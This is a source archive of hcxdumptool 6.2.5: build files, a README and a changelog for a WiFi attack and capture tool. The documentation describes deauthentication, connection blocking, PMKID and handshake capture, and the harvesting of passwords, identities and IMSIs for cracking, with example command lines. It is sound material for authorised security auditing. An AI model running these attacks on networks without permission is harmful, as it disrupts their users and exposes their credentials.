pax_global_header00006660000000000000000000000064141517001440014507gustar00rootroot0000000000000052 comment=e0b4199eb4c083ddd6d6ff9e69c4cdc041b8b83e hcxdumptool-6.2.5/000077500000000000000000000000001415170014400140675ustar00rootroot00000000000000hcxdumptool-6.2.5/.gitignore000066400000000000000000000000251415170014400160540ustar00rootroot00000000000000hcxdumptool hcxpioff hcxdumptool-6.2.5/.gitmodules000066400000000000000000000001731415170014400162450ustar00rootroot00000000000000[submodule "include/android-ifaddrs"] path = include/android-ifaddrs url = https://github.com/morristech/android-ifaddrs hcxdumptool-6.2.5/Android.mk000066400000000000000000000003311415170014400157750ustar00rootroot00000000000000LOCAL_PATH:=$(call my-dir) HCX_CFLAGS:=-std=gnu99 -O3 -Wall -Wextra include $(CLEAR_VARS) LOCAL_MODULE := hcxdumptool LOCAL_CFLAGS += $(HCX_CFLAGS) LOCAL_SRC_FILES := hcxdumptool.c include $(BUILD_EXECUTABLE) hcxdumptool-6.2.5/AndroidManifest.xml000066400000000000000000000002411415170014400176550ustar00rootroot00000000000000 hcxdumptool-6.2.5/Makefile000066400000000000000000000031411415170014400155260ustar00rootroot00000000000000PRODUCTION := 1 PRODUCTION_VERSION := 6.2.5 PRODUCTION_YEAR := 2021 ifeq ($(PRODUCTION),1) VERSION_TAG := $(PRODUCTION_VERSION) else VERSION_TAG := $(shell git describe --tags || echo $(PRODUCTION_VERSION)) endif VERSION_YEAR := $(shell echo $(PRODUCTION_YEAR)) PREFIX ?= /usr BINDIR = $(DESTDIR)$(PREFIX)/bin HOSTOS := $(shell uname -s) CC ?= gcc CFLAGS ?= -O3 -Wall -Wextra CFLAGS += -std=gnu99 DEFS = -DVERSION_TAG=\"$(VERSION_TAG)\" -DVERSION_YEAR=\"$(VERSION_YEAR)\" INSTALL ?= install INSTFLAGS = PKG_CONFIG ?= pkg-config ifeq ($(HOSTOS), Linux) INSTFLAGS += -D endif OPENSSL_LIBS=$(shell $(PKG_CONFIG) --libs openssl) OPENSSL_CFLAGS=$(shell $(PKG_CONFIG) --cflags openssl) TOOLS= TOOLS+=hcxdumptool hcxdumptool_libs=$(OPENSSL_LIBS) hcxdumptool_cflags=$(OPENSSL_CFLAGS) TOOLS+=hcxpioff .PHONY: all build install clean uninstall all: build build: $(TOOLS) .deps: mkdir -p .deps # $1: tool name define tool-build $(1)_src ?= $(1).c $(1)_libs ?= $(1)_cflags ?= $(1): $$($(1)_src) | .deps $$(CC) $$(CFLAGS) $$($(1)_cflags) $$(CPPFLAGS) -MMD -MF .deps/$$@.d -o $$@ $$($(1)_src) $$($(1)_libs) $$(LDFLAGS) $$(DEFS) .deps/$(1).d: $(1) .PHONY: $(1).install $(1).install: $(1) $$(INSTALL) $$(INSTFLAGS) -m 0755 $(1) $$(BINDIR)/$(1) .PHONY: $(1).clean $(1).clean: rm -f .deps/$(1).d rm -f $(1) .PHONY: $(1).uninstall $(1).uninstall: rm -rf $$(BINDIR)/$(1) endef $(foreach tool,$(TOOLS),$(eval $(call tool-build,$(tool)))) install: $(patsubst %,%.install,$(TOOLS)) clean: $(patsubst %,%.clean,$(TOOLS)) rm -rf .deps rm -f *.o *~ uninstall: $(patsubst %,%.uninstall,$(TOOLS)) -include .deps/*.d hcxdumptool-6.2.5/README.md000066400000000000000000000273271415170014400153610ustar00rootroot00000000000000hcxdumptool ============== Small tool to capture packets from wlan devices and to detect weak points within own WiFi networks (e.g.: PreSharedKey or PlainMasterKey is transmitted unencrypted by a CLIENT). Brief description -------------- Stand-alone binaries - designed to run on Arch Linux, but other Linux distributions should work, too. Capture format pcapng is compatible to Wireshark and tshark. Read this post: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats (https://hashcat.net/forum/thread-6661.html) Read this post: New attack on WPA/WPA2 using PMKID (https://hashcat.net/forum/thread-7717.html) Read this post: Hash mode 22000 explained (https://hashcat.net/forum/thread-10253.html) Read this wiki: https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2 Unsupported: Windows OS, macOS, Android, emulators or wrappers and NETLINK! Detailed description -------------- | Tool | Description | | -------------- | ------------------------------------------------------------------------------------------------------ | | hcxdumptool | Tool to run several tests to determine if ACCESS POINTs or CLIENTs are vulnerable | | hcxpioff | Turns Raspberry Pi off via GPIO switch | Work flow -------------- hcxdumptool -> hcxpcapngtool -> hcxhashtool (additional hcxpsktool/hcxeiutool) -> hashcat or JtR hcxdumptool: attack and capture everything (depending on options) hcxpcapngtool: convert everything hcxhashtool: filter hashes hcxpsktool: get weak PSK candidates hcxeiutool: calculate wordlists from ESSID hashcat or JtR: get PSK from hash Get source -------------- ``` git clone https://github.com/ZerBea/hcxdumptool.git cd hcxdumptool ``` Solve dependencies (Debian based distributions: KALI, UBUNTU, ...) -------------- You need to install missing dependencies before running `make`: ``` sudo apt-get install libcurl4-openssl-dev libssl-dev pkg-config ``` Compile -------------- ``` make make install (as super user) ``` Or install via packet manager -------------- ### Arch Linux [Arch Linux](https://www.archlinux.org/) `pacman -S hcxtools` ### Arch Linux ARM [Arch Linux ARM ](https://archlinuxarm.org/) `pacman -S hcxtools` ### Black Arch [Black Arch](https://blackarch.org/) is an Arch Linux-based penetration testing distribution for penetration testers and security researchers `pacman -S hcxtools` Compile for Android -------------- You need: * Android NDK installed in your system and in path variable * This repository cloned with all submodules (`--recursive` flag in `git clone` or `git submodules update` command run) Just run `ndk-build` - built executables for some architectures should be created inside `libs` directory. Copy it to your phone and enjoy. Requirements -------------- * knowledge of radio technology * knowledge of electromagnetic-wave engineering * detailed knowledge of 802.11 protocol * detailed knowledge of key derivation functions * detailed kwowledge of Linux * Operatingsystem: Arch Linux (strict), Kernel >= 5.4 (strict). It may work on other Linux systems (notebooks, desktops) and distributions, too (no support for other distributions, no support for other operating systems). * Chipset must be able to run in monitor mode and driver must support monitor mode as well as full packet injection. Recommended: MEDIATEK (MT7601) or RALINK (RT2870, RT3070, RT5370) chipset * gcc >= 11 recommended (deprecated versions are not supported: https://gcc.gnu.org/) * libopenssl and openssl-dev installed * pkg-config installed * Raspberry Pi A, B, A+, B+, Zero (WH). (Recommended: Zero (WH) or A+, because of a very low power consumption), but notebooks and desktops may work, too. * GPIO hardware mod recommended (push button and LED). * to allow 5/6GHz packet injection, it is mandatory to uncomment a regulatory domain that support this: /etc/conf.d/wireless-regdom If you decide to compile latest git head, make sure that your distribution is updated on latest version. Adapters -------------- hcxdumptool need full (monitor mode and full packet injection running all packet types) and exclusive access to the adapter! Otherwise it will not start! The driver must support monitor mode and full packet injection, as well as ioctl() system calls! Virtual Netlink (libnl) interfaces are not supported! Get information about VENDOR, model, chipset and driver here: https://wikidevi.wi-cat.ru/ Manufacturers do change chipsets without changing model numbers. Sometimes they add (v)ersion or (rev)vision. This list is for information purposes only and should not be regarded as a binding presentation of the products: * Bus 005 Device 073: ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter * Bus 005 Device 062: ID 148f:761a Ralink Technology, Corp. MT7610U ("Archer T2U" 2.4G+5G WLAN Adapter * Bus 005 Device 065: ID 0e8d:7612 MediaTek Inc. MT7612U 802.11a/b/g/n/ac Wireless Adapter * Bus 005 Device 078: ID 0b05:17d1 ASUSTek Computer, Inc. AC51 802.11a/b/g/n/ac Wireless Adapter [Mediatek MT7610U] * Bus 005 Device 071: ID 7392:7710 Edimax Technology Co., Ltd Edimax Wi-Fi * Bus 005 Device 075: ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter * Bus 005 Device 060: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter * Bus 005 Device 064: ID 148f:5572 Ralink Technology, Corp. RT5572 Wireless Adapter * Bus 005 Device 066: ID 0cf3:9271 Qualcomm Atheros Communications AR9271 802.11n * Bus 005 Device 068: ID 0bda:8178 Realtek Semiconductor Corp. RTL8192CU 802.11n WLAN Adapter * Bus 005 Device 082: ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter * 04:00.0 Network controller: Realtek Semiconductor Co., Ltd. RTL8821CE 802.11ac PCIe Wireless Network Adapter Always verify the actual chipset with 'lsusb' and/or 'lspci'! Due to a bug in xhci subsystem other devices may not work at the moment:
https://bugzilla.kernel.org/show_bug.cgi?id=202541 Third party drivers may not compile or work as expected on latest kernels No support for a third party driver which is not part of the official kernel (https://www.kernel.org/)
Report related issues to the site, from which you downloaded the driver No support for a driver which doesn't support monitor and packet injection, native
If you need this features, do a request on www.kernel.org Not recommended WiFi chipsets: * Intel PRO/Wireless (due to MICROCODE issues) * Broadcom (neither monitor mode nor frame injection) * Realtek RTL8811AU, RTL8812AU, RTL 8814AU (due to NETLINK dependency) Antennas -------------- The best high frequency amplifier is a good antenna! It is much better to achieve gain using a good antenna instead of increasing transmitter power. | VENDOR MODEL | TYPE | | ---------------------- | --------------- | | LOGILINK WL0097 | grid parabolic | | TP-LINK TL-ANT2414 A/B | panel | | LevelOne WAN-1112 | panel | | DELOCK 88806 | panel | | TP-LINK TL-ANT2409 A | panel | GPS devices -------------- | VENDOR MODEL | TYPE | | --------------------------- | --------------- | | NAVILOCK NL-701US | USB | | JENTRO BT-GPS-8 activepilot | BLUETOOTH | Useful scripts -------------- | Script | Description | | ------------ | -------------------------------------------------------- | | bash_profile | Autostart for Raspberry Pi (copy to /root/.bash_profile) | | pireadcard | Back up a Pi SD card | | piwritecard | Restore a Pi SD card | | makemonnb | Example script to activate monitor mode | | killmonnb | Example script to deactivate monitor mode | Hardware mod - see docs gpiowait.odg (hcxdumptool) -------------- LED flashes 5 times if hcxdumptool successfully started LED flashes every 5 seconds if everything is fine and signals are received LED flashes twice, if no signal received during the last past 5 seconds Press push button at least > 5 seconds until LED turns on (also LED turns on if hcxdumptool terminates) Green ACT LED flashes 10 times Raspberry Pi turned off and can be disconnected from power supply Do not use hcxdumptool and hcxpioff together! Hardware mod - see docs gpiowait.odg (hcxpioff) -------------- LED flashes every 5 seconds 2 times if hcxpioff successfully started Press push button at least > 5 seconds until LED turns on Green ACT LED flashes 10 times Raspberry Pi turned off safely and can be disconnected from power supply Procedure -------------- first run hcxdumptool -i interface --do_rcascan at least for 30 seconds to determine that the driver support monitor mode and required ioctl() calls, to determine that the driver support full packet injection, to retrieve information about access points and to determine which access points are in attack range. pcapng option codes (Section Header Block) -------------- ENTERPRISE NUMBER 0x2a, 0xce, 0x46, 0xa1 MAGIC NUMBER 0x2a, 0xce, 0x46, 0xa1, 0x79, 0xa0, 0x72, 0x33, 0x83, 0x37, 0x27, 0xab, 0x59, 0x33, 0xb3, 0x62, 0x45, 0x37, 0x11, 0x47, 0xa7, 0xcf, 0x32, 0x7f, 0x8d, 0x69, 0x80, 0xc0, 0x89, 0x5e, 0x5e, 0x98 OPTIONCODE_MACMYORIG 0xf29a (6 byte) OPTIONCODE_MACMYAP 0xf29b (6 byte) OPTIONCODE_RC 0xf29c (8 byte) OPTIONCODE_ANONCE 0xf29d (32 byte) OPTIONCODE_MACMYSTA 0xf29e (6 byte) OPTIONCODE_SNONCE 0xf29f (32 byte) OPTIONCODE_WEAKCANDIDATE 0xf2a0 (64 byte) == 63 characters + zero OPTIONCODE_GPS 0xf2a1 (max 128 byte) Warning -------------- hcxdumptool is designed to be an analysis tool. This means that everything is requested/stored by default. Unwanted information must be filtered out later on, offline! You must use hcxdumptool only on networks you have permission to do this, because: * hcxdumptool is able to prevent complete wlan traffic (depend on selected options) * hcxdumptool is able to capture PMKIDs from access points (only one single PMKID from an access point required) (use hcxpcapngtool to convert them to a format hashcat and/Or JtR understand) * hcxdumptool is able to capture handshakes from not connected clients (only one single M2 from the client is required) (use hcxpcapngtool to convert them to a format hashcat and/Or JtR understand) * hcxdumptool is able to capture handshakes from 5/6GHz clients on 2.4GHz (only one single M2 from the client is required) (use hcxpcapngtool to to a format hashcat and/Or JtR understand) * hcxdumptool is able to capture passwords from the wlan traffic (use hcxpcapngtool -E to save them to file, together with networknames) * hcxdumptool is able to request and capture extended EAPOL (RADIUS, GSM-SIM, WPS) (hcxpcapngtool will show you information about them) * hcxdumptool is able to capture identities from the wlan traffic (for example: request IMSI numbers from mobile phones - use hcxpcapngtool -I to save them to file) * hcxdumptool is able to capture usernames from the wlan traffic (for example: user name of a server authentication - use hcxpcapngtool -U to save them to file) * Do not use a logical interface and leave the physical interface in managed mode * Do not use hcxdumptool in combination with aircrack-ng, reaver, bully or other tools which take access to the interface * Stop all services which take access to the physical interface (NetworkManager, wpa_supplicant,...) * Do not use tools like macchanger, as they are useless, because hcxdumptool uses its own random mac address space hcxdumptool-6.2.5/changelog000066400000000000000000002121751415170014400157510ustar00rootroot0000000000000001.12.2021 ========== release v6.2.5 still supporting OpenSSL 1.1 08.11.2021 ========== hcxdumptool: replaced channel scan engine by frequency scan engine this is high experimental tested devices: USB: Bus 005 Device 060: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter Bus 005 Device 062: ID 148f:761a Ralink Technology, Corp. MT7610U ("Archer T2U" 2.4G+5G WLAN Adapter Bus 005 Device 064: ID 148f:5572 Ralink Technology, Corp. RT5572 Wireless Adapter Bus 005 Device 065: ID 0e8d:7612 MediaTek Inc. MT7612U 802.11a/b/g/n/ac Wireless Adapter Bus 005 Device 066: ID 0cf3:9271 Qualcomm Atheros Communications AR9271 802.11n Bus 005 Device 068: ID 0bda:8178 Realtek Semiconductor Corp. RTL8192CU 802.11n WLAN Adapter Bus 005 Device 071: ID 7392:7710 Edimax Technology Co., Ltd Edimax Wi-Fi Bus 005 Device 073: ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter Bus 005 Device 075: ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter Bus 005 Device 078: ID 0b05:17d1 ASUSTek Computer, Inc. AC51 802.11a/b/g/n/ac Wireless Adapter [Mediatek MT7610U] Bus 005 Device 082: ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter PCI: 04:00.0 Network controller: Realtek Semiconductor Co., Ltd. RTL8821CE 802.11ac PCIe Wireless Network Adapter That is neccessary because, since WiFi 6, channel numbers are no longer unique: https://en.wikipedia.org/wiki/List_of_WLAN_channels 24.10.2021 ========== hcxdumptool: added new option to ignore ioctl() warnings --force_interface : ignore all ioctl() warnings do not report issues, if attacks or channel switch is not working as expected 23.10.2021 ========== added generic hcxdumptool.1 man page 22.10.2021 ========== moved install dir from usr/local/bin to /usr/bin 14.09.2021 ========== release v6.2.4 This is the last version, supporting OpenSSL 1.1 Next version 6.3.0 will need OpenSSL 3.0.0 01.09.2021 ========== hcxdumptool: added new option to the next EAP request entry contained in the sequence passed to --eapreq with a type matching the Desired Auth Type requested in a client's Legacy NAK response --eapreq_follownak : jump to Auth Type requested by client in Legacy Nak response, if type available in remaining request sequence 29.08.2021 ========== hcxdumptool: GPIO flash intervall not longer hardcoded --gpio_statusled_intervall= : Raspberry Pi GPIO LED flash intervall default = flash every 5 seconds 15.08.2021 ========== hcxdumptool: allow MAC instead of filter list --filterlist_ap= : ACCESS POINT MAC or MAC filter list format: 112233445566, 11:22:33:44:55:66, 11-22-33-44-55-66 # comment maximum entries 256 run first --do_rcascan to retrieve information about the target --filterlist_client= : CLIENT MAC or MAC filter list format: 112233445566, 11:22:33:44:55:66, 11-22-33-44-55-66 # comment maximum entries 256 due to MAC randomization of the CLIENT, it does not always work! 17.05.2021 ========== release v 6.1.6 get ready for gcc 11.1.0 18.03.2021 ========== hcxdumptool: added VENDOR filter --filterlist_ap_vendor= : ACCESS POINT MAC filter list by VENDOR format: 112233, 11:22:33, 11-22-33 # comment maximum entries 256 run first --do_rcascan to retrieve information about the target --filterlist_client_VENDOR= : CLIENT MAC filter list format: 112233, 11:22:33, 11-22-33 # comment maximum entries 256 due to MAC randomization of the CLIENT, it does not always work! 09.03.2021 ========== release v 6.1.6 get ready for OpenSSL 3.0 05.03.2021 ========== hcxdumptool: removed preamble option, because it is ignored by most wlan adapters 04.03.2021 ========== hcxdumptool: added new option to use short preamble --short_preamble : use short preamble default: use long preamble that may not work on older devices! 23.02.2021 ========== hcxdumptool: allow output to stdout -o : output file in pcapng format, filename '-' outputs to stdout including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) 14.02.2021 ========== sll_pkttype = PACKET_OUTGOING is completey ingnored in promiscuous mode At least I found a way to detect outgoing packets. Luckily IEEE80211_RADIOTAP_TX_FLAGS is set on outgoing packets. If we check this, we are able to ignore them. That save us CPU time. 13.02.2021 ========== hcxdumptool: added WATCHDOG - we need that to determine if USB device died Raspberry Pi LED will flash twice if now packet received turing the last past 600 seconds print AGE of last received packet in status 09.02.2021 ========== started to prepare to use openssl 3.0 Many structures have been made opaque in OpenSSL 3.0 since OpenSSL 1.0.2 https://wiki.openssl.org/index.php/OpenSSL_3.0 it is recommended to upgrade to at least to OpenSSL 1.1 06.02.2021 ========== hcxdumptool: fixed handling of BE (according to hcxpcapngtool fixes) 18.01.2021 ========== hcxdumptool: added auto channel/auto band. therefore default channel list and predefined channel lists changed! -c : set channel (1,2,3, ...) default: auto channel/auto band maximum entries: 255 standard 802.11 channels (depends on device, driver and world regulatory domain): 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14 36, 38, 40, 44, 48, 52, 56, 60, 64 100, 104, 108, 112, 116, 120, 124, 128 132, 136, 140, 144, 149, 153, 157, 161, 165 201, 205, 209, 213, 217, 221, 225, 229, 233 -s : set predefined scanlist 0 = auto channel/auto band (default) 1 = 1,6,11,3,5,1,6,11,2,4,1,6,11,7,9,1,6,11,8,10,1,6,11,12,13 (optimized 2.4GHz) 2 = 1,2,3,4,5,6,7,8,9,10,11,12,13 (standard 2.4 GHz) 3 = 36,40,44,48,52,56,60,64,100,104,108,112,116,120,124,128,132,136,140,149,153,157,161,165 (standard 5GHz) 4 = 1,2,3,4,5,6,7,8,9,10,11,12,13,36,40,44,48,52,56,60,64,100,104,108,112,116,120,124,128,132,136,140,149,153,157,161,165 (standard 2.4GHz/5GHz) 5 = 201,205,209,213,217,221,225,229,233 (standard 6GHz) 16.01.2021 ========== hcxdumptool: added new option - rcascan ranking is no longer hard coded --rcascan_order=digit> : rcascan sorting order: 0 = sort by HIT (PROBERESPONSE) (default) 1 = sort by COUNT (BEACON) 2 = sort by CHANNEL 14.01.2021 ========== release v 6.1.5 03.01.2021 ========== hcxdummptool: added new option to limit status of rcascan to n lines --rcascan_max=digit> : show only n highest ranking lines default: 256 lines 21.12.2020 ========== removed TP-LINK TL-WN722N v1 (ath9k driver) from list of working devices due to driver issue hcxdumptool: moved from select() to pselect() 20.12.2020 ========== hcxdumptool: added tot (transmission timeout timer) hcxdumptool will no longer freeze if driver died this is a workaround on ath9k driver issue: https://github.com/ZerBea/hcxdumptool/issues/80#issuecomment-748622644 not caused by hcxdumptool: https://bugs.archlinux.org/task/68578 19.12.2020 ========== hcxdumptool: added support for 6GHz channels 201,205,209,213,217,221,225,229,233 on option -c and option -s -s : set predefined scanlist 0 = 1,6,11,3,5,1,6,11,2,4,1,6,11,7,9,1,6,11,8,10,1,6,11,12,13 (default) 1 = 1,2,3,4,5,6,7,8,9,10,11,12,13 2 = 36,40,44,48,52,56,60,64,100,104,108,112,116,120,124,128,132,136,140,149,153,157,161,165 3 = 1,2,3,4,5,6,7,8,9,10,11,12,13,36,40,44,48,52,56,60,64,100,104,108,112,116,120,124,128,132,136,140,149,153,157,161,165 4 = 201,205,209,213,217,221,225,229,233 10.12.2020 ========== Makefile: make use of pkg-config 02.12.2020 ========== release v 6.1.4 27.11.2020 ========== hcxdumptool: show openSSL version in status 24.10.2020 ========== hcxdumptool: Default channels are not longer hard coded. Now hcxdumptool test if channel is available. That allow handling of channels from a patched driver. Some 2 GHz ath9k radios are actually tunable on 2312-2732 on 5 MHz steps CHAN2G(2407, 14) CHAN2G(2402, 15) CHAN2G(2397, 16) CHAN2G(2392, 17) CHAN2G(2387, 18) CHAN2G(2382, 19) CHAN2G(2377, 20) CHAN2G(2372, 21) CHAN2G(2367, 22) CHAN2G(2362, 23) CHAN2G(2357, 24) CHAN2G(2352, 25) CHAN2G(2347, 26) CHAN2G(2342, 27) CHAN2G(2337, 28) CHAN2G(2332, 29) CHAN2G(2327, 30) CHAN2G(2322, 31) CHAN2G(2317, 32) CHAN2G(2312, 33) 09.10.2020 ========== release v 6.1.3 fixed broken GPS handling added better GPS error handling 03.10.2020 ========== hcxdumptool: added new option --example : show some example command lines 30.09.2020 ========== hcxdumptool: added new options --eapreq=[:],... : send max. 20 subsequent EAP requests after initial EAP ID request, hex string starting with EAP Type response is terminated with: :F = EAP Failure :S = EAP Success :I = EAP ERP Initiate :F = EAP ERP Finish :D = Deauthentication :T = TLS shutdown :- = no packet default behavior is terminating all responses with a EAP Failure, after last one the client is deauthenticated --eaptlstun : activate TLS tunnel negotiation and Phase 2 EAP requests when requesting PEAP using --eapreq requires --eap_server_cert and --eap_server_key --eap_server_cert= : EAP TLS tunnel Server cert PEM file --eap_server_key= : EAP TLS tunnel Server private key file 17.09.2020 ========== release v 6.1.2 15.09.2020 ========== hcxdumptool: added new option --stop_client_m2_attacks= : stop attacks against CLIENTS after 10 M2 frames received affected: ap-less (EAPOL 2/4 - M2) attack require hcxpcangtool --all option 24.08.2020 ========== hcxdumptool: added new option --eapreq=[:],... : send max. 20 subsequent EAP requests after initial EAP ID request, hex string starting with EAP Type response is terminated with :F = EAP Failure, :S = EAP Success, :I = EAP ERP Initiate, :F = EAP ERP Finish, :D = Deauthentication, :- = no packet default behavior is terminating all responses with a Failure packet, after last one the client is deauthenticated 14.08.2020 ========== hcxdumptool: added new option --wpaent to announce WPA ENTERPRISE 06.08.2020 ========== release v 6.1.1 fixed handling of long opts 30.07.2020 ========== hcxdumptool: added new option --ip to allow to set IP for server / client mode 29.07.2020 ========== hcxdumptool: add new radiotap flag: IEEE80211_RADIOTAP_F_TX_NOSEQNO https://patchwork.kernel.org/patch/11680527/ 29.07.2020 ========== release v 6.1.0 19.07.2020 ========== hcxdumptool: new option --beaconparams= : update or add Information Elements in all transmitted beacons maximum 50 IEs as TLV hex string, tag id 0 (ESSID) will be ignored, tag id 3 (channel) overwritten multiple IEs with same tag id are added, default IE is overwritten by the first 06.07.2020 ========== hcxdumptool: allow to set channel (-c) on --check_injection fixed display channel if tags.channel is empty added new option -s to set predefined scanlists -s : set predefined scanlist 0 = 1,6,11,3,5,1,6,11,2,4,1,6,11,7,9,1,6,11,8,10,1,6,11,12,13 (default) 1 = 1,2,3,4,5,6,7,8,9,10,11,12,13 2 = 36,40,44,48,52,56,60,64,100,104,108,112,116,120,124,128,132,136,140,149,153,157,161,165 3 = 1,2,3,4,5,6,7,8,9,10,11,12,13,36,40,44,48,52,56,60,64,100,104,108,112,116,120,124,128,132,136,140,149,153,157,161,165 15.06.2020 ========== release v 6.0.7 10.06.2020 ========== hcxdumptool: changed behavior of --essidlist and --active_beacon according to https://github.com/ZerBea/hcxdumptool/issues/115 --essidlist - transmit beacons from this list only --active_beacon - transmit beacons from collected ESSIDs and from essidlist 21.05.2020 ========== release v 6.0.6 18.05.2020 ========== hcxdumptool: added new option --do_targetscan --do_targetscan= : same as do_rcascan - hide all networks, except target 17.05.2020 ========== hcxdumptool: fixed issue that caused hcxdumptool to respond on probereuest even if --silent is selcted allow MAC format 11:22:33:44:55:66 and 11-22-33-44-55-66 in filterlists 01.05.2020 ========== hcxdumptool: added option mask to save vendor defined action frames -f : frames to save bitmask: 0: clear default values 1: MANAGEMENT frames (default) 2: EAP and EAPOL frames (default) 4: IPV4 frames 8: IPV6 frames 16: WEP encrypted frames 32: WPA encrypted frames 64: vendor defined frames (AWDL) 05.04.2020 ========== release v 6.0.5 Security fix: We do not want to disturb uninvolved users! Increase error count and terminate hcxdumptool if channel was changed by a third party tool. After transmitting a request, hcxdumptool expect an answer on the same channel. If the channel was changed by a third party tool, hcxdumptool will never get this answer and transmit again, again and again. This will jam all channels, set by the third party tool. https://forum.hashkiller.io/index.php?threads/ap-less-attack-with-hcxtools.21036/page-4#post-237403 04.04.2020 ========== release v 6.0.4 27.03.2020 ========== hcxdumptool: ERROR_MAX not longer hard coded --error_max= : terminate hcxdumptool if error maximum reached default: 100 errors 26.03.2020 ========== Some drivers / firmwares provide only limited monitor functions instead of full packet injection capabilities. hcxdumptool: added packet injection test --check_injection : run packet injection test to determine that driver support full packet injection\n" 18.03.2020 ========== release v 6.0.3 removed debug message "OS not supported" from Makefile 14.03.2020 ========== release v 6.0.2 complete rewrite from scratch the Raspberry Pi is a little bit too slow, so we have to reduce status output. Most CLIENTs running randomized MACs. They are no longer displayed. improved IE tag walk similar to hcxpcapngtool improved attack vector added new options to improve attack vector against hardened targets added more information to help menu added option to import Berkeley packet Filter code fom tcpdump as alternative to apfilterlist and clientfilterlist make less noise on the the channel (receive more, transmit less) WLAN REASON CODE (deauthentication) no longer hardcoded moved to git versioning on non releases $ hcxdumptool -h hcxdumptool 6.0.2 (C) 2020 ZeroBeat usage : hcxdumptool press the switch to terminate hcxdumptool hardware modification is necessary, read more: https://github.com/ZerBea/hcxdumptool/tree/master/docs example: hcxdumptool -o output.pcapng -i wlp39s0f3u4u5 -t 5 --enable_status=3 do not run hcxdumptool on logical (NETLINK) interfaces (monx, wlanxmon) do not use hcxdumptool in combination with other 3rd party tools, which take access to the interface short options: -i : interface (monitor mode will be enabled by hcxdumptool) can also be done manually: ip link set down iw dev set type monitor ip link set up WARNING: iw use NETLINK (libnl) and hcxdumptool will not work on pure NETLINK interfaces -o : output file in pcapng format including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) -f : frames to save bitmask: 0: clear default values 1: MANAGEMENT frames (default) 2: EAP and EAPOL frames (default) 4: IPV4 frames 8: IPV6 frames 16: WEP encrypted frames 32: WPA encrypted frames to clear default values use -f 0 first, followed by desired frame type (e.g. -f 0 -f 4) -c : set scan list (1,2,3, ...) default scan list: 1...13 maximum entries: 127 allowed channels (depends on the device): 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14 32, 34, 36, 38, 40, 42, 44, 46, 48, 50, 52, 54, 56, 58, 60, 62, 64, 68, 96 100, 102, 104, 106, 108, 110, 112, 114, 116, 118, 120, 122, 124, 126, 128 132, 134, 136, 138, 140, 142, 144, 149, 151, 153, 155, 157, 159 161, 165, 169, 173 -t : stay time on channel before hopping to the next channel default 4 seconds -m : set monitor mode by ioctl() system call and quit -I : show WLAN interfaces and quit -C : show available channels and quit if no channels are available, interface is probably in use or doesn't support monitor mode long options: --do_rcascan : show radio channel assignment (scan for target access points) this can be used to test that ioctl() calls and packet injection is working if you got no HIT, packet injection is possible not working also it can be used to get information about the target and to determine that the target is in range use this mode to collect data for the filter list run this mode at least for 2 minutes to save all received raw packets use option -o --reason_code= : deauthentication reason code recommended codes: 1 WLAN_REASON_UNSPECIFIED 2 WLAN_REASON_PREV_AUTH_NOT_VALID 4 WLAN_REASON_DISASSOC_DUE_TO_INACTIVITY 5 WLAN_REASON_DISASSOC_AP_BUSY 6 WLAN_REASON_CLASS2_FRAME_FROM_NONAUTH_STA 7 WLAN_REASON_CLASS3_FRAME_FROM_NONASSOC_STA (default) 9 WLAN_REASON_STA_REQ_ASSOC_WITHOUT_AUTH --disable_client_attacks : do not attack clients affected: ap-less (EAPOL 2/4 - M2) attack --disable_ap_attacks : do not attack access points affected: connected clients and client-less (PMKID) attack --stop_ap_attacks= : stop attacks against ACCESS POINTs if BEACONs received default: stop after 600 BEACONs --resume_ap_attacks= : resume attacks against ACCESS POINTs after BEACONs received default: 864000 BEACONs --disable_deauthentication : do not send deauthentication or disassociation frames affected: conntected clients --silent : do not transmit! hcxdumptool is acting like a passive dumper expect possible packet loss --eapoltimeout= : set EAPOL TIMEOUT (microseconds) default: 20000 usec --bpfc= : input Berkeley Packet Filter (BPF) code steps to create a BPF (it only has to be done once): set hcxdumptool monitormode $ hcxumptool -m create BPF to protect a MAC $ tcpdump -i not wlan addr1 11:22:33:44:55:66 and not wlan addr2 11:22:33:44:55:66 -ddd > protect.bpf recommended to protect own devices or create BPF to attack a MAC $ tcpdump -i wlan addr1 11:22:33:44:55:66 or wlan addr2 11:22:33:44:55:66 -ddd > attack.bpf not recommended, because important pre-authentication frames will be lost due to MAC randomization of the CLIENTs use the BPF code $ hcxumptool -i --bpfc=attack.bpf ... see man pcap-filter for a list of all filter options --filterlist_ap= : ACCESS POINT MAC filter list format: 112233445566 + comment maximum entries 256 run first --do_rcascan to retrieve information about the target --filterlist_client= : CLIENT MAC filter list format: 112233445566 # comment maximum entries 256 due to MAC randomization of the CLIENT, it does not always work! --filtermode= : mode for filter list mandatory in combination with --filterlist_ap and/or --filterlist_client 0: ignore filter list (default) 1: use filter list as protection list do not interact with ACCESS POINTs and CLIENTs from this list 2: use filter list as target list only interact with ACCESS POINTs and CLIENTs from this list not recommended, because important pre-authentication frames will be lost due to MAC randomization of the CLIENTs --weakcandidate= : use this pre shared key (8...63 characters) for weak candidate alert will be saved to pcapng to inform hcxpcaptool default: --mac_ap : use this MAC as ACCESS POINT MAC instead of a randomized one format: 112233445566 --mac_client : use this MAC as CLIENT MAC instead of a randomized one format: 112233445566 --essidlist= : transmit beacons from this ESSID list maximum entries: 256 ESSIDs --active_beacon : transmit beacon once every 200000 usec affected: ap-less --flood_beacon : transmit beacon on every received beacon affected: ap-less --infinity : prevent that a CLIENT can establish a connection to an assigned ACCESS POINT affected: ACCESS POINTs and CLIENTs --use_gps_device= : use GPS device /dev/ttyACM0, /dev/ttyUSB0, ... NMEA 0183 $GPGGA $GPGGA --use_gpsd : use GPSD device NMEA 0183 $GPGGA, $GPRMC --nmea= : save track to file format: NMEA 0183 $GPGGA, $GPRMC, $GPWPL to convert it to gpx, use GPSBabel: gpsbabel 